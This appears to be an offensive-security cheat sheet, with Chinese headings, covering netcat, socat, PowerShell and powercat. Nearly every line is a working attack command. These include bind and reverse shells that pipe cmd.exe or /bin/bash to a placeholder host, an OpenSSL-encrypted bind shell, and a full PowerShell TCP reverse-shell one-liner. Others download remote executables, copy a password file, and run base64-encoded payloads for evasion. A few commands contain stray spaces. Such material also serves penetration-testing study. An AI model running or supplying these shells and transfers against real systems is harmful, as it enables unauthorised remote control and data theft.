• netcat
• socat
• powershell
• powercat

netcat

# 當作telnet埠指紋探測
nc -nv x.x.x.x 110

# 檔案下載
# 服務端
nc -nlvp 4444 > tmp.exe
# 客戶端
nc -nv x.x.x.x 4444 < tmp.exe

# 正向shell
# 目標
nc -nlvp 4444 -e cmd.exe
# 本機
nc -nv x.x.x.x 4444

# 反向shell
# 本機
nc -nlvp 4444
# 目標
nc -nv x.x.x.x 4444 -e /bin/bash

socat

# 檔案傳輸
# 服務端
socat TCP4-LISTEN:443,fork file:secret_passwords.txt
# 客戶端
socat TCP4:x.x.x.x:443 file:received_secret_passwords.txt,create

# 反向shell
# 本機
socat -d -d TCP4-LISTEN:443 STDOUT
# 目標
socat TCP4:x.x.x.x:443 EXEC:/bin/bash

# 加密 正向shell
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36 2 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
# 本機
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin /bash
socat - OPENSSL:x.x.x.x:443,verify=0
 

powershell

# 允許執行powershell程式碼
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy

# 下載檔案
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/t.exe','C:\Users\user\Desktop\t.exe')"

# 反向shell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('x.x.x.x',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()"

# 正向shell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt es.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
 

powercat

# 載入
. .\powercat.ps1
# 執行
powercat
powercat -h

# 下載檔案
powercat -c x.x.x.x -p 443 -i C:\Users\user\powercat.ps1

# 反向shell
# 方法一：
powercat -c x.x.x.x -p 443 -e cmd.exe
# 方法二：
powercat -c x.x.x.x -p 443 -e cmd.exe -g > reverseshell.ps1
./reverseshell.ps1

# base64加密
powercat -c x.x.x.x -p 443 -e cmd.exe -ge > reverseshell. ps1
powershell.exe -E ZgB1...(reverseshell. ps1中base64加密內容)

# 正向shell
powercat -l -p 443 -e cmd.exe